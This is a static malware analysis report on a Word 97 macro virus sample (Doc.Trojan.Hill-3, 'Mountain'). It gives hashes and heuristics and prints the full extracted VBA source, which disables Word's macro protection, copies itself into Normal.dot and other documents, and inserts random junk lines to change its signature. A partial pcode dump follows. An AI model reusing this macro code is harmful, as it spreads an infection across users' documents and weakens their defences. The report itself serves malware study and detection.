Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 084d2c276c342153…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 48.0 KB  Created: 1999-05-02 10:11:00  Authoring application: Microsoft Word 8.0  First seen: 2012-06-14
MD5: 23884d71515811f9b189aab3cecf3491
SHA-1: 77ff399dc0017339c90eb5a47a14587b9ee784f3
SHA-256: 084d2c276c342153fc49ae86b051d3adc26d0cab219d82510f5984f3375193ff
Risk Score: 100

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is identified as malicious by ClamAV and contains legacy WordBasic auto-exec markers and VBA macros. The Document_Close macro disables Word's macro virus protection and Normal-template save prompt, then copies its own code between the active document and the Normal.dot template so that the macro propagates to other documents; the helper functions MountainNT and MountainAD pad the copied code with randomly generated junk lines (dummy assignments, comments and blank lines), which changes the macro's content on every infection and is consistent with an attempt to evade signature-based detection while establishing persistence.

Heuristics (3)

  • ClamAV: Doc.Trojan.Hill-3 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Hill-3
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7440 bytes
SHA-256: 49f691d177e228b12164b401ef935df9a880e357cfb973bb0fd93a1985616849
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
'mountain
Private Sub Document_Close()
Dim j
   On Error Resume Next
   'Macro.Word97.Mountain by Duke/SMF
   Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
   Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
   Options.VirusProtection = False
   Options.ConfirmConversions = False
   Options.SaveNormalPrompt = False
   j = 1
   Randomize
   If NT.Lines(1, 1) <> "'mountain" Then
      For i = 1 To AD.CountOfLines
         NT.InsertLines j, AD.Lines(i, 1)
         j = j + 1
         Ex = Mid(AD.Lines(i, 1), 1, 1)
         If Ex = Asc(" ") Then MountainNT
      Next
   End If
   If AD.Lines(1, 1) <> "'mountain" Then
      For i = 1 To NT.CountOfLines
         AD.InsertLines i, NT.Lines(i, 1)
         j = j + 1
         Ex = Mid(NT.Lines(i, 1), 1, 1)
         If Ex = Asc(" ") Then MountainAD
      Next
   End If
End Sub
Function MountainNT()
   R = Rnd
   If R < 1 And R > 0.08 Then
      NT.InsertLines j, " S = " + Chr(34) + Gener + Chr(34)
   End If
   If R < 0.08 And R > 0.05 Then
      NT.InsertLines j, " '" + Gener
   End If
   If R < 0.05 And R > 0.03 Then
      NT.InsertLines j, "  "
   End If
   If R > 0.03 Then j = j + 1
End Function
Function MountainAD()
   R = Rnd
   If R < 1 And R > 0.08 Then
      AD.InsertLines j, " S = " + Chr(34) + Gener + Chr(34)
   End If
   If R < 0.08 And R > 0.05 Then
      AD.InsertLines j, " '" + Gener
   End If
   If R < 0.05 And R > 0.03 Then
      AD.InsertLines j, "  "
   End If
   If R > 0.03 Then j = j + 1
End Function
Function Gener()
   Gener = ""
   For i = 1 To Int(20 * Rnd + 1)
      Gener = Gener + Chr(Int(128 * Rnd + 48))
   Next
End Function

' Processing file: /opt/analyzer/scan_staging/cb4895ab01ed45cda0cea248cdb85965.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1182 bytes
' Macros/VBA/NewMacros - 9025 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0008 "mountain"
' Line #1:
' 	FuncDefn (Private Sub Document_Close())
' Line #2:
' 	Dim 
' 	VarDefn j
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	QuoteRem 0x0003 0x0021 "Macro.Word97.Mountain by Duke/SMF"
' Line #5:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NT 
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set AD 
' Line #7:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #8:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #9:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #10:
' 	LitDI2 0x0001 
' 	St j 
' Line #11:
' 	ArgsCall Read 0x0000 
' Line #12:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NT 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0009 "'mountain"
' 	Ne 
' 	IfBlock 
' Line #13:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	MemLd CountOfLines 
' 	For 
' Line #14:
' 	Ld j 
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	ArgsMemLd Lines 0x0002 
' 	Ld NT 
' 	ArgsMemCall InsertLines 0x0002 
' Line #15:
' 	Ld j 
' 	LitDI2 0x0001 
' 	Add 
' 	St j 
' Line #16:
' 	Ld i 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	ArgsMemLd Lines 0x0002 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	St Ex 
' Line #17:
' 	Ld Ex 
' 	LitStr 0x0001 " "
' 	ArgsLd Asc 0x0001 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ArgsCall MountainNT 0x0000 
' 	EndIf 
' Line #18:
' 	StartForVariable 
' 	Next 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x0009 "'mountain"
' 	Ne 
' 	IfBlock 
' Line #21:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariab
... (truncated)